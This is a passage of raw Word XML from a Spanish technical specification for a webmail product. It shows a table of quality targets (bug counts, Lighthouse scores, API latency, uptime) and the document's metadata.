            </w:r>
            <w:r>
              <w:t xml:space="preserve">output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Bugs en producción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 2 críticos/semana</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Issue tracker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lighthouse Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 90</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PageSpeed Insights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lighthouse Accessibility</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 95</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">PageSpeed Insights</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Latencia P95 API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&lt; 200ms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Prometheus histogram</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Disponibilidad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">&gt; 99.9%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uptime monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="250"/>
    <w:bookmarkEnd w:id="251"/>
    <w:bookmarkEnd w:id="2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Webmail 6.0 ��� Documento Funcional y Arquitectura T��cnica</dc:title>
  <dc:creator>Agent Swarm Research &amp; Development</dc:creator>
  <dc:language>es</dc:language>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-23T23:18:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-23T23:18:54Z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Junio 2026</vt:lpwstr>
  </property>
</Properties>
</file>